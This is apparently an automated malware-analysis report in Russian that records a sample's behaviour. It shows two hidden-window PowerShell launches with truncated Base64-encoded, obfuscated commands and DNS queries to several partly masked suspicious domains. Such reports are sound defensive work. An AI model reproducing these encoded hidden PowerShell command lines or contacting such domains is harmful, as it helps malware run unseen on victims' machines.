Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABiAGEAMwBkADkAZABkAGMAOQBmADUAYgA3AD0AJwBhADAAeAAyADkAZgA5ADIAYQA5AGEAZgBkAGUANgA2AGQAJwA7AC...
- DNS ASK to##.##cestore.co.kr
- DNS ASK 4c###sma.com
- DNS ASK st#####.smsmagica.com
- DNS ASK al####omus.co.nz
- DNS ASK im##h.my
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABiAGEAMwBkADkAZABkAGMAOQBmADUAYgA3AD0AJwBhADAAeAAyADkAZgA5ADIAYQA5AGEAZgBkAGUANgA2AGQAJwA7AC...' (со скрытым окном)